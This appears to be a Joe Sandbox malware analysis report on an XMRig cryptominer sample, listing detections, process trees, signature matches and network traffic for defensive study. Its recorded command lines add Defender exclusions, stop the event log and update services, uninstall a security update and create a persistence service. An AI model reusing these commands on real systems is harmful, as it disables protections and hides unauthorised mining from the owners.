Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xmr new.exe

Overview

General Information

Sample name:xmr new.exe
Analysis ID:1585416
MD5:7d6398ebfb82a24748617189bf4ad691
SHA1:6c96d0e343e1e84bf58670f1249c1694a2012f04
SHA256:d7cd81563e5b98b9a329286557de71186d3f8f364a46691aca253ca00e4c3ef2
Tags:CoinMinerexeuser-aachum
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Desusertion Ports
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • xmr new.exe (PID: 2416 cmdline: "C:\Users\user\Desktop\xmr new.exe" MD5: 7D6398EBFB82A24748617189BF4AD691)
    • powershell.exe (PID: 6336 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1080 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 3492 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 5420 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2068 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6512 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1524 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3252 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2284 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3360 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3004 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3240 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 3412 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 584 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • sc.exe (PID: 4020 cmdline: C:\Windows\system32\sc.exe delete "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4516 cmdline: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4944 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4844 cmdline: C:\Windows\system32\sc.exe start "CKTJZLMO" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • eejhedztifcv.exe (PID: 4752 cmdline: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe MD5: 7D6398EBFB82A24748617189BF4AD691)
    • powershell.exe (PID: 5388 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3280 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 2016 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 2992 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6512 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2280 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2572 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2284 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3968 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2688 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4512 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4848 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 4196 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 376 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1028 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 4864 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 1532 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000042.00000002.2793385319.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000042.00000002.2793385319.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x37eb98:$a1: mining.set_target
      • 0x370e20:$a2: XMRIG_HOSTNAME
      • 0x373748:$a3: Usage: xmrig [OPTIONS]
      • 0x370df8:$a4: XMRIG_VERSION

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      66.2.dialer.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        66.2.dialer.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x37ef98:$a1: mining.set_target
        • 0x371220:$a2: XMRIG_HOSTNAME
        • 0x373b48:$a3: Usage: xmrig [OPTIONS]
        • 0x3711f8:$a4: XMRIG_VERSION
        66.2.dialer.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
        • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
        66.2.dialer.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
        • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
        • 0x3cd180:$s3: \\.\WinRing0_
        • 0x376148:$s4: pool_wallet
        • 0x3705f0:$s5: cryptonight
        • 0x370600:$s5: cryptonight
        • 0x370610:$s5: cryptonight
        • 0x370620:$s5: cryptonight
        • 0x370638:$s5: cryptonight
        • 0x370648:$s5: cryptonight
        • 0x370658:$s5: cryptonight
        • 0x370670:$s5: cryptonight
        • 0x370680:$s5: cryptonight
        • 0x370698:$s5: cryptonight
        • 0x3706b0:$s5: cryptonight
        • 0x3706c0:$s5: cryptonight
        • 0x3706d0:$s5: cryptonight
        • 0x3706e0:$s5: cryptonight
        • 0x3706f8:$s5: cryptonight
        • 0x370710:$s5: cryptonight
        • 0x370720:$s5: cryptonight
        • 0x370730:$s5: cryptonight

        Sigma Signatures

        Change of critical system settings

        barindex
        Sigma detected: Disable power options
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\xmr new.exe", ParentImage: C:\Users\user\Desktop\xmr new.exe, ParentProcessId: 2416, ParentProcessName: xmr new.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 2284, ProcessName: powercfg.exe

        System Summary

        barindex
        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\xmr new.exe", ParentImage: C:\Users\user\Desktop\xmr new.exe, ParentProcessId: 2416, ParentProcessName: xmr new.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6336, ProcessName: powershell.exe
        Sigma detected: Communication To Uncommon Desusertion Ports
        Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DesusertionIp: 80.240.16.67, DesusertionIsIpv6: false, DesusertionPort: 8888, EventID: 3, Image: C:\Windows\System32\dialer.exe, Initiated: true, ProcessId: 1532, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49708
        Sigma detected: Powershell Defender Exclusion
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\xmr new.exe", ParentImage: C:\Users\user\Desktop\xmr new.exe, ParentProcessId: 2416, ParentProcessName: xmr new.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6336, ProcessName: powershell.exe
        Sigma detected: Uncommon Svchost Parent Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 3412, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe
        Sigma detected: New Service Creation Using Sc.EXE
        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\xmr new.exe", ParentImage: C:\Users\user\Desktop\xmr new.exe, ParentProcessId: 2416, ParentProcessName: xmr new.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto", ProcessId: 4516, ProcessName: sc.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\xmr new.exe", ParentImage: C:\Users\user\Desktop\xmr new.exe, ParentProcessId: 2416, ParentProcessName: xmr new.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6336, ProcessName: powershell.exe

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Sigma detected: Stop EventLog
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\xmr new.exe", ParentImage: C:\Users\user\Desktop\xmr new.exe, ParentProcessId: 2416, ParentProcessName: xmr new.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 4944, ProcessName: sc.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-07T16:10:22.405902+010020362892Crypto Currency Mining Activity Detected192.168.2.9651881.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-07T16:09:59.175553+010028269302Crypto Currency Mining Activity Detected192.168.2.94970880.240.16.678888TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for dropped file
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeReversingLabs: Detection: 73%
        Multi AV Scanner detection for submitted file
        Source: xmr new.exeReversingLabs: Detection: 73%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

        Bitcoin Miner

        barindex
        Yara detected Xmrig cryptocurrency miner
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000042.00000002.2793385319.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Detected Stratum mining protocol
        Source: global trafficTCP traffic: 192.168.2.9:49708 -> 80.240.16.67:8888 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"41ifakragknzbfdnfjzm9djd14pwku6q6adt7y7qtnq4avfwe1bmj8fhgsqtqkv82rxtobqika7ud71ufhvqkmuttjpziaw","pass":"new","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
        Found strings related to Crypto-Mining
        Source: dialer.exeString found in binary or memory: cryptonight-monerov7
        Source: xmr new.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: eejhedztifcv.exe, 00000024.00000003.1566367264.000001AC2D400000.00000004.00000001.00020000.00000000.sdmp
        Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BCDCE0 FindFirstFileExW,31_2_000001F385BCDCE0
        Source: C:\Windows\System32\lsass.exeCode function: 37_2_000002A29199DCE0 FindFirstFileExW,37_2_000002A29199DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25EDDCE0 FindFirstFileExW,40_2_0000014E25EDDCE0
        Source: C:\Windows\System32\dwm.exeCode function: 42_2_00000283E0F5DCE0 FindFirstFileExW,42_2_00000283E0F5DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001FB539CDCE0 FindFirstFileExW,67_2_000001FB539CDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CBD8BDDCE0 FindFirstFileExW,68_2_000001CBD8BDDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001F2BD16DCE0 FindFirstFileExW,69_2_000001F2BD16DCE0
        Source: global trafficTCP traffic: 192.168.2.9:49708 -> 80.240.16.67:8888
        Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.9:65188 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.9:49708 -> 80.240.16.67:8888
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
        Source: global trafficDNS traffic detected: DNS query: miners20002.com
        Source: lsass.exe, 00000025.00000000.1535320717.000002A290A4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalR
        Source: lsass.exe, 00000025.00000000.1535493416.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1536047558.000002A2913A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: lsass.exe, 00000025.00000000.1536010223.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535899113.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2800180911.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2799573161.000002A2912D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: lsass.exe, 00000025.00000002.2799238553.000002A29123E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1536010223.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2800180911.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535837894.000002A29123E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
        Source: lsass.exe, 00000025.00000000.1535837894.000002A29123E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
        Source: lsass.exe, 00000025.00000000.1535493416.000002A290A88000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1536047558.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535837894.000002A29123E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
        Source: eejhedztifcv.exe, 00000024.00000003.1566367264.000001AC2D400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
        Source: eejhedztifcv.exe, 00000024.00000003.1566367264.000001AC2D400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
